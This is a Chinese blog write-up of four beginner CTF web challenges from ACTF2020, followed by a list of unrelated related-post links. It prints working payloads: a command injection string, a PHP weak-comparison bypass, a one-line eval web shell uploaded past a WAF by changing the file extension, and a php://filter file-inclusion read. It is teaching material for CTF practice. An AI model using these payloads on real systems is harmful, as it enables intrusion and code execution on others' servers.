• [ACTF2020 新生赛]WEB汇总


    写在前边

    这只是解题套路的汇总文,相关的知识点后续填坑(下次一定)

    所有环境在BUUCTF上可复现

    1.Exec

      访问看到这样页面。想到命令注入,输入

    127.0.0.1;

      无报错回显,说明无WAF,直接用截断符号配合普通命令

    127.0.0.1;cat flag.txt

     

    2.BackupFile

      根据题目意思,网站存在备份文件

    index.php.bak

      打开查看源码

    <?php
    include_once "flag.php";
    
    if(isset($_GET['key'])) {
        $key = $_GET['key'];
        if(!is_numeric($key)) {
            exit("Just num!");
        }
        $key = intval($key);
        $str = "123ffwsfwefwf24r2f32ir23jrw923rskfjwtsw54w3";
        if($key == $str) {
            echo $flag;
        }
    }
    else {
        echo "Try to find out source file!";
    } 

      if 后面的==是弱相等;这里的字符型被转换成了整型,传入key=123

    3.Upload

      访问页面。鼠标滑过电灯泡发现灯泡点亮有个文件上传,传入一句话木马

     <?php @eval($_POST['233']) ?>

      有WAF,将木马改成.jpg格式,上传抓包改成.phtml格式

       菜刀连接

     4.Include

      很明显的文件包含

    ?file=php://filter/convert.base64-encode/resource=flag.php

      获得直接获得flag.php的Base64

       解码

     

     

    以上知识点后续的会在漏洞原理补充

  • 相关阅读:
    【案例】ora600
    Oracle 10046 event
    Oracle redo与undo浅析
    BUFFER CACHE和SHARED POOL原理
    oracle体系结构基础
    Oracle-buffer cache、shared pool
    获取oracle数据库对象定义
    ORA-20011
    expdp/impdp中NETWORK_LINK参数使用
    day03-Python基础
  • 原文地址:https://www.cnblogs.com/Lee-404/p/12773534.html
Copyright © 2020-2023  润新知